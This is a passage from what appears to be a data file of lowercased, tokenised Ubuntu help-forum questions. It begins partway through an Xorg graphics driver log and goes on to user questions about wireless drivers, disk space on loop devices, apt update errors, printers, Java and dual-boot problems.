] compiled for 4.0.2 , module version = 1.0.0 [ 77.254 ] module class : x.org video driver [ 77.254 ] ( ii ) unloadmodule : `` nvidia '' [ 77.254 ] ( ii ) unloading nvidia [ 77.254 ] ( ii ) failed to load module `` nvidia '' ( already loaded , 32549 ) [ 77.254 ] ( ii ) loadmodule : `` nouveau '' [ 77.254 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 77.254 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 77.254 ] compiled for 1.11.3 , module version = 0.0.16 [ 77.254 ] module class : x.org video driver [ 77.254 ] abi class : x.org video driver , version 11.0 [ 77.254 ] ( ii ) unloadmodule : `` nouveau '' [ 77.254 ] ( ii ) unloading nouveau [ 77.254 ] ( ii ) failed to load module `` nouveau '' ( already loaded , 32549 ) [ 77.254 ] ( ii ) loadmodule : `` nv '' [ 77.255 ] ( ww ) warning , could n't open module nv [ 77.255 ] ( ii ) unloadmodule : `` nv '' [ 77.255 ] ( ii ) unloading nv [ 77.255 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 77.255 ] ( ii ) loadmodule : `` vesa '' [ 77.255 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 77.255 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 77.255 ] compiled for 1.11.3 , module version = 2.3.0 [ 77.255 ] module class : x.org video driver [ 77.255 ] abi class : x.org video driver , version 11.0 [ 77.255 ] ( ii ) unloadmodule : `` vesa '' [ 77.255 ] ( ii ) unloading vesa [ 77.255 ] ( ii ) failed to load module `` vesa '' ( already loaded , 0 ) [ 77.255 ] ( ii ) loadmodule : `` fbdev '' [ 77.255 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 77.255 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 77.255 ] compiled for 1.11.3 , module version = 0.4.2 [ 77.255 ] abi class : x.org video driver , version 11.0 [ 77.255 ] ( ii ) unloadmodule : `` fbdev '' [ 77.255 ] ( ii ) unloading fbdev [ 77.255 ] ( ii ) failed to load module `` fbdev '' ( already loaded , 0 ) [ 77.255 ] ( ii ) nvidia dlloader x driver 295.40 thu apr 5 21:38:35 pdt 2012 [ 77.255 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 77.265 ] ( ii ) nouveau driver date : wed nov 30 18:56:54 2011 +0100 [ 77.265 ] ( ii ) nouveau driver for nvidia chipset families : [ 77.265 ] riva tnt ( nv04 ) [ 77.265 ] riva tnt2 ( nv05 ) [ 77.265 ] geforce 256 ( nv10 ) [ 77.265 ] geforce 2 ( nv11 , nv15 ) [ 77.265 ] geforce 4mx ( nv17 , nv18 ) [ 77.265 ] geforce 3 ( nv20 ) [ 77.265 ] geforce 4ti ( nv25 , nv28 ) [ 77.265 ] geforce fx ( nv3x ) [ 77.265 ] geforce 6 ( nv4x ) [ 77.265 ] geforce 7 ( g7x ) [ 77.265 ] geforce 8 ( g8x ) [ 77.265 ] geforce gtx 200 ( nva0 ) [ 77.265 ] geforce gtx 400 ( nvc0 ) [ 77.265 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 77.265 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 77.265 ] ( -- ) using vt number 2 [ 77.269 ] ( ii ) loading sub module `` fb '' [ 77.269 ] ( ii ) loadmodule : `` fb '' [ 77.269 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 77.282 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 77.282 ] compiled for 1.11.3 , module version = 1.0.0 [ 77.282 ] abi class : x.org ansi c emulation , version 0.4 [ 77.282 ] ( ii ) loading sub module `` wfb '' [ 77.282 ] ( ii ) loadmodule : `` wfb '' [ 77.283 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 77.296 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 77.296 ] compiled for 1.11.3 , module version = 1.0.0 [ 77.296 ] abi class : x.org ansi c emulation , version 0.4 [ 77.296 ] ( ii ) loading sub module `` ramdac '' [ 77.296 ] ( ii ) loadmodule : `` ramdac '' [ 77.296 ] ( ii ) module `` ramdac '' already built-in [ 77.302 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 77.302 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 77.302 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 77.322 ] ( ww ) falling back to old probe method for vesa [ 77.322 ] ( ww ) falling back to old probe method for fbdev [ 77.322 ] ( ii ) loading sub module `` fbdevhw '' [ 77.322 ] ( ii ) loadmodule : `` fbdevhw '' [ 77.322 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 77.334 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 77.334 ] compiled for 1.11.3 , module version = 0.0.2 [ 77.334 ] abi class : x.org video driver , version 11.0 [ 77.334 ] ( ee ) open /dev/fb0 : no such file or directory [ 77.334 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 77.334 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 77.334 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 77.334 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 77.334 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 77.334 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 79.036 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 79.118 ] ( ii ) nvidia ( gpu-0 ) : display ( dell e228wfp ( dfp-1 ) ) does not support nvidia 3d [ 79.118 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 79.120 ] ( ii ) nvidia ( 0 ) : nvidia gpu quadro nvs 285 ( nv44gl ) at pci:7:0:0 ( gpu-0 ) [ 79.120 ] ( -- ) nvidia ( 0 ) : memory : 131072 kbytes [ 79.120 ] ( -- ) nvidia ( 0 ) : videobios : 05.44.02.63.03 [ 79.120 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 79.120 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 79.120 ] ( -- ) nvidia ( 0 ) : connected display device ( s ) on quadro nvs 285 at pci:7:0:0 [ 79.120 ] ( -- ) nvidia ( 0 ) : crt-0 [ 79.120 ] ( -- ) nvidia ( 0 ) : dell e228wfp ( dfp-1 ) [ 79.120 ] ( -- ) nvidia ( 0 ) : crt-0 : 400.0 mhz maximum pixel clock [ 79.120 ] ( -- ) nvidia ( 0 ) : dell e228wfp ( dfp-1 ) : 155.0 mhz maximum pixel clock [ 79.120 ] ( -- ) nvidia ( 0 ) : dell e228wfp ( dfp-1 ) : internal single link tmds [ 79.120 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 79.120 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 79.120 ] ( ** ) nvidia ( 0 ) : all display devices . ) [ 79.120 ] ( ii ) nvidia ( 0 ) : assigned display device : crt-0 [ 79.120 ] ( == ) nvidia ( 0 ) : [ 79.120 ] ( == ) nvidia ( 0 ) : no modes were requested ; the default mode `` nvidia-auto-select '' [ 79.120 ] ( == ) nvidia ( 0 ) : will be used as the requested mode . [ 79.120 ] ( == ) nvidia ( 0 ) : [ 79.120 ] ( ii ) nvidia ( 0 ) : validated modes : [ 79.120 ] ( ii ) nvidia ( 0 ) : `` nvidia-auto-select '' [ 79.120 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 1024 x 768 [ 79.121 ] ( ww ) nvidia ( 0 ) : unable to get display device crt-0 's edid ; can not compute dpi [ 79.121 ] ( ww ) nvidia ( 0 ) : from crt-0 's edid . [ 79.121 ] ( == ) nvidia ( 0 ) : dpi set to ( 75 , 75 ) ; computed from built-in default [ 79.121 ] ( ii ) unloadmodule : `` nouveau '' [ 79.121 ] ( ii ) unloading nouveau [ 79.121 ] ( ii ) unloadmodule : `` vesa '' [ 79.121 ] ( ii ) unloading vesa [ 79.121 ] ( ii ) unloadmodule : `` fbdev '' [ 79.121 ] ( ii ) unloading fbdev [ 79.121 ] ( ii ) unloadmodule : `` fbdevhw '' [ 79.121 ] ( ii ) unloading fbdevhw [ 79.121 ] ( -- ) depth 24 pixmap format is 32 bpp [ 79.128 ] ( ii ) nvidia ( 0 ) : acpi : failed to connect to the acpi event daemon ; the daemon [ 79.128 ] ( ii ) nvidia ( 0 ) : may not be running or the `` acpidsocketpath '' x [ 79.128 ] ( ii ) nvidia ( 0 ) : configuration option may not be set correctly . when the [ 79.128 ] ( ii ) nvidia ( 0 ) : acpi event daemon is available , the nvidia x driver will [ 79.128 ] ( ii ) nvidia ( 0 ) : try to use it to receive acpi event notifications . for [ 79.128 ] ( ii ) nvidia ( 0 ) : details , please see the `` connecttoacpid '' and [ 79.128 ] ( ii ) nvidia ( 0 ) : `` acpidsocketpath '' x configuration options in appendix b : x [ 79.128 ] ( ii ) nvidia ( 0 ) : config options in the readme . [ 79.128 ] ( ii ) nvidia ( 0 ) : setting mode `` nvidia-auto-select '' [ 79.224 ] ( ii ) loading extension nv-glx [ 79.262 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 79.262 ] ( == ) nvidia ( 0 ) : backing store disabled [ 79.262 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 79.263 ] ( == ) nvidia ( 0 ) : dpms enabled [ 79.263 ] ( ii ) loading extension nv-control [ 79.263 ] ( ii ) loading extension xinerama [ 79.263 ] ( ii ) loading sub module `` dri2 '' [ 79.263 ] ( ii ) loadmodule : `` dri2 '' [ 79.263 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 79.263 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 79.263 ] compiled for 1.11.3 , module version = 1.2.0 [ 79.263 ] abi class : x.org server extension , version 6.0 [ 79.263 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 79.263 ] ( ii ) nvidia ( 0 ) : [ dri2 ] vdpau driver : nvidia [ 79.263 ] ( == ) randr enabled [ 79.263 ] ( ii ) initializing built-in extension generic event extension [ 79.263 ] ( ii ) initializing built-in extension shape [ 79.263 ] ( ii ) initializing built-in extension mit-shm [ 79.263 ] ( ii ) initializing built-in extension xinputextension [ 79.263 ] ( ii ) initializing built-in extension xtest [ 79.263 ] ( ii ) initializing built-in extension big-requests [ 79.263 ] ( ii ) initializing built-in extension sync [ 79.263 ] ( ii ) initializing built-in extension xkeyboard [ 79.263 ] ( ii ) initializing built-in extension xc-misc [ 79.263 ] ( ii ) initializing built-in extension security [ 79.263 ] ( ii ) initializing built-in extension xinerama [ 79.263 ] ( ii ) initializing built-in extension xfixes [ 79.263 ] ( ii ) initializing built-in extension render [ 79.263 ] ( ii ) initializing built-in extension randr [ 79.263 ] ( ii ) initializing built-in extension composite [ 79.264 ] ( ii ) initializing built-in extension damage [ 79.265 ] ( ii ) initializing extension glx [ 79.471 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 79.488 ] ( ii ) config/udev : adding input device power button ( /dev/input/event1 ) [ 79.488 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 79.488 ] ( ii ) loadmodule : `` evdev '' [ 79.488 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 79.520 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 79.520 ] compiled for 1.11.3 , module version = 2.7.0 [ 79.520 ] module class : x.org xinput driver [ 79.520 ] abi class : x.org xinput driver , version 16.0 [ 79.520 ] ( ii ) using input driver 'evdev ' for 'power button' [ 79.520 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 79.520 ] ( ** ) power button : always reports core events [ 79.520 ] ( ** ) evdev : power button : device : `` /dev/input/event1 '' [ 79.520 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 79.520 ] ( -- ) evdev : power button : found keys [ 79.520 ] ( ii ) evdev : power button : configuring as keyboard [ 79.520 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input1/event1 '' [ 79.520 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 79.520 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 79.520 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 79.520 ] ( ** ) option `` xkb_layout '' `` fr '' [ 79.520 ] ( ** ) option `` xkb_variant '' `` latin9 '' [ 79.521 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-816a055a5ff7d63897839a4bdedc3908551e49da.xkm [ 79.532 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 79.532 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 79.532 ] ( ii ) using input driver 'evdev ' for 'power button' [ 79.532 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 79.532 ] ( ** ) power button : always reports core events [ 79.532 ] ( ** ) evdev : power button : device : `` /dev/input/event0 '' [ 79.532 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 79.532 ] ( -- ) evdev : power button : found keys [ 79.532 ] ( ii ) evdev : power button : configuring as keyboard [ 79.532 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0c0c:00/input/input0/event0 '' [ 79.532 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 7 ) [ 79.532 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 79.532 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 79.532 ] ( ** ) option `` xkb_layout '' `` fr '' [ 79.532 ] ( ** ) option `` xkb_variant '' `` latin9 '' [ 79.532 ] ( ii ) config/udev : adding input device hda intel line ( /dev/input/event5 ) [ 79.532 ] ( ii ) no input driver specified , ignoring this device . [ 79.532 ] ( ii ) this device may have been added with another device file . [ 79.533 ] ( ii ) config/udev : adding input device hda intel mic ( /dev/input/event6 ) [ 79.533 ] ( ii ) no input driver specified , ignoring this device . [ 79.533 ] ( ii ) this device may have been added with another device file . [ 79.533 ] ( ii ) config/udev : adding input device hda intel front headphone ( /dev/input/event7 ) [ 79.533 ] ( ii ) no input driver specified , ignoring this device . [ 79.533 ] ( ii ) this device may have been added with another device file . [ 79.533 ] ( ii ) config/udev : adding input device hda intel line-out ( /dev/input/event8 ) [ 79.533 ] ( ii ) no input driver specified , ignoring this device . [ 79.533 ] ( ii ) this device may have been added with another device file . [ 79.533 ] ( ii ) config/udev : adding input device usb optical mouse ( /dev/input/event2 ) [ 79.533 ] ( ** ) usb optical mouse : applying inputclass `` evdev pointer catchall '' [ 79.533 ] ( ii ) using input driver 'evdev ' for 'usb optical mouse' [ 79.533 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 79.533 ] ( ** ) usb optical mouse : always reports core events [ 79.533 ] ( ** ) evdev : usb optical mouse : device : `` /dev/input/event2 '' [ 79.533 ] ( -- ) evdev : usb optical mouse : vendor 0x461 product 0x4d15 [ 79.533 ] ( -- ) evdev : usb optical mouse : found 3 mouse buttons [ 79.533 ] ( -- ) evdev : usb optical mouse : found scroll wheel ( s ) [ 79.533 ] ( -- ) evdev : usb optical mouse : found relative axes [ 79.533 ] ( -- ) evdev : usb optical mouse : found x and y relative axes [ 79.534 ] ( ii ) evdev : usb optical mouse : configuring as mouse [ 79.534 ] ( ii ) evdev : usb optical mouse : adding scrollwheel support [ 79.534 ] ( ** ) evdev : usb optical mouse : yaxismapping : buttons 4 and 5 [ 79.534 ] ( ** ) evdev : usb optical mouse : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 79.534 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.1/usb3/3-2/3-2:1.0/input/input2/event2 '' [ 79.534 ] ( ii ) xinput : adding extended input device `` usb optical mouse '' ( type : mouse , id 8 ) [ 79.541 ] ( ii ) evdev : usb optical mouse : initialized for relative axes . [ 79.541 ] ( ** ) usb optical mouse : ( accel ) keeping acceleration scheme 1 [ 79.541 ] ( ** ) usb optical mouse : ( accel ) acceleration profile 0 [ 79.541 ] ( ** ) usb optical mouse : ( accel ) acceleration factor : 2.000 [ 79.541 ] ( ** ) usb optical mouse : ( accel ) acceleration threshold : 4 [ 79.541 ] ( ii ) config/udev : adding input device usb optical mouse ( /dev/input/mouse0 ) [ 79.541 ] ( ii ) no input driver specified , ignoring this device . [ 79.541 ] ( ii ) this device may have been added with another device file . [ 79.542 ] ( ii ) config/udev : adding input device dell dell wired multimedia keyboard ( /dev/input/event3 ) [ 79.542 ] ( ** ) dell dell wired multimedia keyboard : applying inputclass `` evdev keyboard catchall '' [ 79.542 ] ( ii ) using input driver 'evdev ' for 'dell dell wired multimedia keyboard' [ 79.542 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 79.542 ] ( ** ) dell dell wired multimedia keyboard : always reports core events [ 79.542 ] ( ** ) evdev : dell dell wired multimedia keyboard : device : `` /dev/input/event3 '' [ 79.542 ] ( -- ) evdev : dell dell wired multimedia keyboard : vendor 0x413c product 0x2110 [ 79.542 ] ( -- ) evdev : dell dell wired multimedia keyboard : found keys [ 79.542 ] ( ii ) evdev : dell dell wired multimedia keyboard : configuring as keyboard [ 79.542 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.7/usb1/1-2/1-2.4/1-2.4:1.0/input/input3/event3 '' [ 79.542 ] ( ii ) xinput : adding extended input device `` dell dell wired multimedia keyboard '' ( type : keyboard , id 9 ) [ 79.542 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 79.542 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 79.542 ] ( ** ) option `` xkb_layout '' `` fr '' [ 79.542 ] ( ** ) option `` xkb_variant '' `` latin9 '' [ 79.542 ] ( ii ) config/udev : adding input device dell dell wired multimedia keyboard ( /dev/input/event4 ) [ 79.542 ] ( ** ) dell dell wired multimedia keyboard : applying inputclass `` evdev pointer catchall '' [ 79.542 ] ( ** ) dell dell wired multimedia keyboard : applying inputclass `` evdev keyboard catchall '' [ 79.542 ] ( ii ) using input driver 'evdev ' for 'dell dell wired multimedia keyboard' [ 79.542 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 79.542 ] ( ** ) dell dell wired multimedia keyboard : always reports core events [ 79.542 ] ( ** ) evdev : dell dell wired multimedia keyboard : device : `` /dev/input/event4 '' [ 79.542 ] ( -- ) evdev : dell dell wired multimedia keyboard : vendor 0x413c product 0x2110 [ 79.542 ] ( -- ) evdev : dell dell wired multimedia keyboard : found 9 mouse buttons [ 79.542 ] ( -- ) evdev : dell dell wired multimedia keyboard : found scroll wheel ( s ) [ 79.542 ] ( -- ) evdev : dell dell wired multimedia keyboard : found relative axes [ 79.542 ] ( -- ) evdev : dell dell wired multimedia keyboard : found x and y relative axes [ 79.542 ] ( -- ) evdev : dell dell wired multimedia keyboard : found keys [ 79.542 ] ( ii ) evdev : dell dell wired multimedia keyboard : configuring as mouse [ 79.542 ] ( ii ) evdev : dell dell wired multimedia keyboard : configuring as keyboard [ 79.542 ] ( ii ) evdev : dell dell wired multimedia keyboard : adding scrollwheel support [ 79.542 ] ( ** ) evdev : dell dell wired multimedia keyboard : yaxismapping : buttons 4 and 5 [ 79.542 ] ( ** ) evdev : dell dell wired multimedia keyboard : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 79.542 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.7/usb1/1-2/1-2.4/1-2.4:1.1/input/input4/event4 '' [ 79.542 ] ( ii ) xinput : adding extended input device `` dell dell wired multimedia keyboard '' ( type : keyboard , id 10 ) [ 79.542 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 79.542 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 79.542 ] ( ** ) option `` xkb_layout '' `` fr '' [ 79.542 ] ( ** ) option `` xkb_variant '' `` latin9 '' [ 79.543 ] ( ii ) evdev : dell dell wired multimedia keyboard : initialized for relative axes . [ 79.543 ] ( ** ) dell dell wired multimedia keyboard : ( accel ) keeping acceleration scheme 1 [ 79.543 ] ( ** ) dell dell wired multimedia keyboard : ( accel ) acceleration profile 0 [ 79.543 ] ( ** ) dell dell wired multimedia keyboard : ( accel ) acceleration factor : 2.000 [ 79.543 ] ( ** ) dell dell wired multimedia keyboard : ( accel ) acceleration threshold : 4 [ 79.543 ] ( ii ) config/udev : adding input device dell dell wired multimedia keyboard ( /dev/input/mouse1 ) [ 79.543 ] ( ii ) no input driver specified , ignoring this device . [ 79.543 ] ( ii ) this device may have been added with another device file .
260604	wireless detecting network but not connecting - ubuntu 12.04	i have a dell inspiron m301z running with ubuntu 12.04 . it used to run fine until i reinstalled it . it worked fine during the installation but when i downloaded the updates via updates manager the connection dropped . now it keeps trying to connect to the network but fails each time . the connection is working on windows . in additional drivers it shows the broadcom sta wireless driver as activated . sudo lshw -c network *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : 01 serial : c4:46:19:95 : cf:08 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:17 memory : d0300000-d0303fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 04 serial : 00:26 : b9:70:33:62 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a ip=192.168.2.4 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport : a000 ( size=256 ) memory : d0004000-d0004fff memory : d0000000-d0003fff rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 2 : dell-wifi : wireless lan soft blocked : no hard blocked : no 3 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no 4 : hci0 : bluetooth soft blocked : no hard blocked : no i have read a few posts on here and tried a few things but nothing worked . thanks
260610	connect wd tv live hub	i have a pc ( pc1 ) running ubuntu 12.10 , connected to the router wirelessly . a wd tv live hub is connected to pc using a crossover ethernet cable . configuration : wired connection method : shared to other computers and `` require ipv4 addressing for this connection to complete '' is checked . the wd tv live hub has ip address 10.42.0.22 using dhcp and it has internet . my problem is that i ca n't see the wd tv live hub from other pcs ( excluded pc1 ) . if i set a static ip ( 192.168.1.xx ) to wd tv live hub , it has n't internet .
260617	upgrade from 10.10 can not be done	i still have 10.10 running . i would like to upgrade . if i do it , i get `` not supported '' messages . what can i do ? thanks , eric j .
260618	ati radeon mobility x1600 drivers installation	i have just installed ubuntu 12.10 on my old macbook pro 2006 . it has a ati radeon mobility x1600 256mb and i would grateful if you could tell me how to install the graphic card drivers . so far the ubuntu runs fine . thank you in advance
260620	resize /dev/loop0 and increase space	filesystem 1k-blocks used available use % mounted on /dev/loop0 2765720 2393576 231652 92 % / udev 496568 12 496556 1 % /dev tmpfs 202148 796 201352 1 % /run none 5120 0 5120 0 % /run/lock none 505368 80 505288 1 % /run/shm /dev/sda7 13632464 8209984 5422480 61 % /host /dev/loop1 4031680 2452148 1374732 65 % /usr this is the output of df command . how do i increase the avalable in dev/loop0 or may be resize it .
260621	installing brother dcp-j315w	i want to install a brother dcp-j315w printer . i use ubuntu 12.04 when i search in brother solutions center there are drivers but they come with the instruction too bad to install . are there other drivers ? should i use another version of ubuntu ?
260626	i can not remove ruby1.9.3p0 from ubuntu . what is the process ?	i have installed ruby 1.9.3p0 and on executing the command ruby -v it shows the version 1.9.3p0 installed . when i try to remove it by command sudo apt-get remove ruby1.9.3p0 it says package not found so not removed . what should i do ?
260627	when trying to save music to home on ubuntu , it says i would only have 20gb space even though my partition has 270gb , what 's wrong ?	i 'm a bit stuck here , and i 'm new to ubuntu so please forgive me if this is a stupid question : d. lately , i tried to save 60gb of music to my home folder 's music folder in ubuntu but it said there would only be 10gb free space out of 20gb . but i installed ubuntu to a partition of 270gb of which 240gb are still free . apart from that , i have a d partition with 100gb and a c partition , with windows on it , of 70gb and no other partition . when i looked in terminal , it said , there would also be something like a partition ( but i do n't know if it is ) called loop , of 29gb . considering that ubuntu takes about 8gb , this could be where my home folder is but i do n't know if this is right , and i do n't know what to do in order to get more space ( the 240gb ) . can someone please help me ? disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xb33d55e5 device boot start end blocks id system /dev/sda1 2048 52430847 26214400 1c hidden w95 fat32 ( lba ) /dev/sda2 * 52430848 201422969 74496061 7 hpfs/ntfs/exfat /dev/sda3 201422977 976773119 387675071+ f w95 ext 'd ( lba ) /dev/sda5 201423040 411970859 105273910 7 hpfs/ntfs/exfat /dev/sda6 411970928 976773119 282401096 7 hpfs/ntfs/exfat
260629	how can i use the default theme from 12.10 in 12.04 ?	i really like the changes that was made to the default theme in 12.10 . however 12.10 keeps on loosing the ability to see my braodcom wifi card and i am experiencing a lot of graphical glitches as well . 12.04 is rock solid and i use this for my production work . please tell me there is a safe and easy way to import the new theme from 12.10 into 12.04 . thanks in advance , george
260636	how to resolve `` hash sum mismatch '' while updating ?	i need a help with ubuntu updates , when i run sudo apt-get update i get this : w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_precise_main_source_sources hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/all.repository.backtrack-linux.org_dists_revolution_main_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/all.repository.backtrack-linux.org_dists_revolution_main_binary-i386_packages hash sum mismatch w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise/universe/source/sources 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise_universe_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_precise_universe_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead . what 's the problem and how do i resolve this ?
260637	keyboard repeat not working	i am using ubuntu 12.10 , i changed some language settings ( from 'english us ' to 'hindi ' and then back to 'english us ' ) , during which i think i did something wrong but could not remember what . now key repeat is not working , means if i want to type any letter multiple times then i have to hit that key multiple times i.e . if i want to scroll down in a document by 20 lines then i have to hit the 'scroll down ' key 20 times , key repeat it is not working . can some body help me to figure out which setting i 've changed and how to restore it and is there any way to restore all system/user settings to their default value ?
260646	java vm 32 on ubuntu 64	this is a problem , a school project is to make a midlet with java micro edition i have dowloaded java wireless tool kit below http : //www.oracle.com/technetwork/java/javasebusiness/downloads/java-archive-downloads-javame-419430.html # sun_java_wireless_toolkit-2.5.2_01b-oth-jpr when i run midlet project i get error below : java.lang.unsatisfiedlinkerror : /home/nikola/faks/cs230/wtk2.5.2_ml/bin/sublime.so : /home/nikola/faks/cs230/wtk2.5.2_ml/bin/sublime.so : wrong elf class : elfclass32 ( possible cause : architecture word width mismatch ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1825 ) at java.lang.runtime.load0 ( runtime.java:792 ) at java.lang.system.load ( system.java:1059 ) at com.sun.kvem.sublime. < init > ( unknown source ) at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) at java.lang.reflect.constructor.newinstance ( constructor.java:525 ) at java.lang.class.newinstance0 ( class.java:372 ) at java.lang.class.newinstance ( class.java:325 ) at com.sun.kvem.lime.createlime ( unknown source ) at com.sun.kvem.kvmbridge. < init > ( unknown source ) at com.sun.kvem.kvmbridge.getbridge ( unknown source ) at com.sun.kvem.midp.midp.run ( unknown source ) at com.sun.kvem.environment.emulatorinvoker.runemulatorimpl ( unknown source ) at com.sun.kvem.environment.emulatorinvoker.main ( unknown source ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:601 ) at com.sun.kvem.environment.jvm.main ( unknown source ) question is , a 64-bit ubuntu can run 32-bit a java virtual machine ( jvm ) ?
260647	wo n't go back to windows !	i installed ubuntu on my c drive . i ca n't get back to windows i tried almost everything ! if you can help please answer . did i delete my windows 7 ? please respond .
